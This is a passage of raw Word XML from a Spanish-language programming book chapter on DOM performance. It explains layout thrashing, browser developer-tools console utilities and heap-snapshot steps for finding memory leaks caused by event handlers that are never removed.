          </w:tcPr>
          <w:p w14:paraId="2C27D4A2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Un recálculo por vuelta del bucle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F1504A0" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Arriba</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="31370CE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0DAFFA5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cambiar clases, no estilos individuales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2C8E2446" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Varias escrituras de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> por una de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>classList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64126845" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>4.6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27F72B6D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="0000351B">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3F9B8AE8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDECEA" w:fill="FDECEA"/>
          </w:tcPr>
          <w:p w14:paraId="5049B3D6" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>OJO ACÁ: el código que se ve perfectamente razonable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3684FE45" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Este problema tiene nombre propio en inglés —</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>layout thrashing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">— y es traicionero por una razón concreta: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>el código se ve perfectamente razonable.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nadie sospecha que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>tarjeta.offsetHeight</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> sea caro: parece una propiedad como cualquier otra.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="271B7BA1" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Pero no estás leyendo una propiedad guardada. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Estás pidiendo un cálculo que obliga al navegador a resolver todo lo que tenía pendiente</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>, antes de contestarte. Es preguntarle el saldo al contador después de cada movimiento: si cargás cien y después preguntás, suma una vez; si preguntás cada vez, suma cien.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64628BCE" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">La lista de propiedades que disparan esto conviene tenerla a mano: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>offsetWidth</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>offsetHeight</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>offsetTop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>offsetLeft</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>clientWidth</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>clientHeight</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>scrollTop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>scrollHeight</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getBoundingClientRect()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>getComputedStyle()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y el </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>innerText</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> de 4.6.2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="339A4025" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Regla: primero escribís todo, después leés todo.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nunca alternes dentro de un bucle.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D2CBA5A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulodelcaptulo"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc239320012"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.11 — Herramientas de diagnóstico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="47F5E0E4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc239320013"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El panel de elementos, y su pestaña olvidada</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="3EC16EA2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>panel de elementos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> muestra el DOM actual, no el HTML original (4.3), y permite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>editar nodos en vivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> para probar una corrección antes de escribirla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE1498" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahí adentro hay una pestaña que casi nadie abre y es la herramienta más directa para diagnosticar 4.9: la de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>escuchas de eventos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Enumera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>todos los manejadores del elemento seleccionado y de sus ancestros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, y si al desmontar y volver a montar una vista el número crece, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>hay una baja faltante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>: no es sospecha, es evidencia.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="70AE7DDE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3960"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FAFAFA" w:fill="FAFAFA"/>
          </w:tcPr>
          <w:p w14:paraId="2028D999" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="909497"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>FIGURA 4.6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3075E8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="909497"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>captura</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10282F62" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="909497"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Captura del panel mostrando los manejadores registrados en un elemento y sus ancestros. Idealmente, la misma vista montada dos veces, para que se vea el manejador duplicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="711FA17C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Epgrafe"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Figura 4.6. El panel de escuchas de eventos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65830B5B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc239320014"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Cuatro utilidades de consola</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="6F577EE4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>$0                              // el elemento seleccionado en el inspector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABF30F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>$$("selector")                  // atajo de querySelectorAll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01982E3E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>getEventListeners($0)           // los manejadores registrados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46329EF2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>monitorEvents($0, "click")      // registra en consola cada evento del tipo dado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F087A04" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc239320015"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El panel de memoria, el que confirma la fuga</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="233DB110" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Convierte la sospecha en hecho. Son cuatro pasos, y saltearse uno da un resultado que no significa nada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BE82D7" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Tomar una instantánea del montón de memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AE2547" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Montar y desmontar la vista sospechosa varias veces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED91751" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Forzar la recolección de basura y tomar una segunda instantánea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19606874" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Listaconnmeros"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparar y filtrar por </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>nodos separados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2293DE85" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Si aparecen nodos separados que deberían haberse liberado, hay una referencia viva. El panel muestra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>la cadena de retención</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> —qué mantiene vivo al nodo— y ahí aparece el manejador sin dar de baja.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9020" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9020"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="7B80E71D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3960"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="dotted" w:sz="8" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FAFAFA" w:fill="FAFAFA"/>
          </w:tcPr>
          <w:p w14:paraId="1DCC4685" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="909497"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>FIGURA 4.5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40BA2A9E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="909497"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>captura</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4101C21F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:color w:val="909497"/>
                <w:sz w:val="18"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Captura del panel de memoria filtrado por nodos separados, con la cadena de retención desplegada mostrando qué mantiene vivo al nodo. Es la evidencia de la sección 4.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B2F4B28" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Epgrafe"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Figura 4.5. Nodos separados y cadena de retención</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6EC25CB9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E2F0DC" w:fill="E2F0DC"/>
          </w:tcPr>
          <w:p w14:paraId="00630EAF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="538135"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>EXPERIMENTO — comprobá la fuga con tus propias manos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7336F82F" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>El experimento más útil del capítulo, y son diez minutos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDC0E27" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="100"/>
              <w:ind w:left="357"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Escribí una función que cree un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>div</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, le registre un manejador de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>click</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>document</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> y devuelva una función que sólo haga </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>div.remove()</w:t>
            </w:r>
